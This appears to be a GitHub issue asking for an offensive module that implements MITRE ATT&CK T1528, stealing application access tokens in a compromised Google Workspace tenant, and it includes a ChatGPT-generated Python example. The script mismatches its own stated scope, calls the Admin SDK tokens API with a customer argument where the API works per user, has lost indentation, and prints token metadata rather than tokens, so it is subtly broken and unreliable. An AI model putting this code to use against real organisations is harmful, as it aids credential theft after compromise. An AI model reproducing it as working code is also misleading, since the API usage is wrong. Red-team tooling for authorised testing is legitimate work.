[Feature Request] Add Python module for Stealing Application Access Tokens #9
Description
🐍 Python Module for MITRE ATT&CK Technique
Tactic Name: Credential Access
Technique Name: Steal Application Access Token
Technique ID: T1528
Technique Description: Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.
Describe the solution you'd like
A Application Access Token Stealing Module for use with a compromised GWS environment for Credential Access.
Requirements:
- Google Admin SDK API enabled
- Python packages (google-auth google-auth-oauthlib google-auth-httplib2 google-api-python-client, email, base64)
- Scopes (https://www.googleapis.com/auth/admin.directory.user)
Module Workflow:
Step 1: Collect all available Application Access Tokens
Module Actions:
1. Authenticate
2. Build the Directory API client
3. Retrieve the list of application access tokens
4. Print the access tokens
ChatGPT Example Script
from google.oauth2 import service_account
from googleapiclient.discovery import build
# replace with the path to your service account key file
KEY_FILE_LOCATION = '/path/to/service_account_key.json'
# replace with your customer ID
CUSTOMER_ID = 'my_customer'
# replace with your scope
SCOPE = 'https://www.googleapis.com/auth/admin.directory.group.member.readonly'
# create credentials from service account key file
credentials = service_account.Credentials.from_service_account_file(KEY_FILE_LOCATION, scopes=[SCOPE])
# build the Directory API client
directory_service = build('admin', 'directory_v1', credentials=credentials)
# retrieve the list of application access tokens
results = directory_service.tokens().list(customer=CUSTOMER_ID).execute()
# print the access tokens
for token in results.get('items', []):
print(token.get('applicationName'), token.get('kind'), token.get('clientId'), token.get('scopes'))